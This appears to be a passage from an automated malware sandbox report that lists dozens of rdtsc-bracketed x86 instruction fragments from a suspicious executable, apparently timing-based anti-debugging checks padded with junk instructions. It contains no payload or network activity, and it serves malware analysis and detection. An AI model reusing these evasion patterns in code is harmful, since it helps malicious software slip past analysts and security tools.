Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A578EC second address: A57912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FA3D4D82106h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B1F second address: A57B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B23 second address: A57B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B29 second address: A57B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnc 00007FA3D4C68E56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov cx, F61Bh 0x00000015 push 00000004h 0x00000017 mov di, D68Bh 0x0000001b nop 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B4A second address: A57B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B4E second address: A57B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A58046 second address: A5804C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A581EB second address: A58205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FA3D4C68E61h 0x0000000f jmp 00007FA3D4C68E5Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9371D second address: A9374E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FA3D4D8210Ch 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FA3D4D82119h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A938F6 second address: A938FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9642A second address: A96438 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A96438 second address: A9643E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9643E second address: A96442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1368A second address: A13690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A13690 second address: A13694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A13694 second address: A136C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3D4C68E56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA3D4C68E5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA3D4C68E64h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A136C4 second address: A136C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A136C8 second address: A136E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA3D4C68E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FA3D4C68E5Ch 0x00000015 jne 00007FA3D4C68E56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9914B second address: A99150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A992D0 second address: A992D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A992D6 second address: A992DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD2D second address: A9FD33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD33 second address: A9FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD39 second address: A9FD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FE68 second address: A9FEAD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jmp 00007FA3D4D82114h 0x00000015 popad 0x00000016 jne 00007FA3D4D82128h 0x0000001c push edi 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007FA3D4D82110h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0007 second address: AA0018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4C68E5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0018 second address: AA001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0182 second address: AA0193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007FA3D4C68E5Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0193 second address: AA0198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0198 second address: AA01A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA02CA second address: AA02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FA3D4D82106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA02DA second address: AA02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA3D4C68E56h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA288F second address: AA28B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D82119h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA28B2 second address: AA28B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA667B second address: AA6680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA6680 second address: AA6687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA6687 second address: AA668D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA668D second address: AA669D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FA3D4C68E56h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5C04 second address: AA5C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5C08 second address: AA5C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5C25 second address: AA5C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4D82114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5C3D second address: AA5C4F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3D4C68E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5D95 second address: AA5D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA607A second address: AA607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA607E second address: AA60A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82115h 0x00000007 jne 00007FA3D4D82106h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA9127 second address: AA9131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA3D4C68E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA9131 second address: AA913F instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA913F second address: AA9148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA9148 second address: AA914E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA914E second address: AA9159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB2189 second address: AB218F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB218F second address: AB2193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB0385 second address: AB038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB038B second address: AB038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB0696 second address: AB069C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB069C second address: AB06BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Eh 0x00000007 jmp 00007FA3D4C68E61h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB06BF second address: AB06CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB06CF second address: AB06D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB06D5 second address: AB06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB0D79 second address: AB0D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB0D7F second address: AB0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA3D4D82106h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB18DC second address: AB1926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3D4C68E56h 0x0000000a jmp 00007FA3D4C68E66h 0x0000000f popad 0x00000010 jmp 00007FA3D4C68E63h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA3D4C68E5Fh 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB1926 second address: AB192E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB192E second address: AB1937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB1937 second address: AB193D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB5DF8 second address: AB5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB5DFE second address: AB5E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB5A05 second address: AB5A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB5A0B second address: AB5A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2B2D second address: AC2B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA3D4C68E56h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2B3A second address: AC2B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FA3D4D82106h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2B53 second address: AC2B5D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2B5D second address: AC2B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC106A second address: AC106E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC106E second address: AC1082 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA3D4D82106h 0x0000000e jp 00007FA3D4D82106h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1507 second address: AC152E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FA3D4C68E62h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC152E second address: AC1550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82117h 0x00000007 pushad 0x00000008 jno 00007FA3D4D82106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC17E6 second address: AC1804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E67h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1804 second address: AC1834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3D4D82113h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FA3D4D8213Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FA3D4D82106h 0x0000001c jg 00007FA3D4D82106h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1834 second address: AC1854 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3D4C68E56h 0x00000008 jmp 00007FA3D4C68E63h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC19A4 second address: AC19B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FA3D4D82106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1B23 second address: AC1B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1B27 second address: AC1B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jc 00007FA3D4D82106h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1B37 second address: AC1B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007FA3D4C68E56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1B44 second address: AC1B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnc 00007FA3D4D82112h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FA3D4D82106h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC223F second address: AC2255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2255 second address: AC225F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2989 second address: AC299C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC299C second address: AC29B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC29B8 second address: AC29EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FA3D4C68E63h 0x00000014 popad 0x00000015 jno 00007FA3D4C68E5Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC29EB second address: AC29F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA3D4D8210Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC8AA0 second address: AC8AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC8AA6 second address: AC8AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC8BDF second address: AC8C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f jne 00007FA3D4C68E8Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA3D4C68E65h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: ACB080 second address: ACB099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA3D4D82114h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD8A20 second address: AD8A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
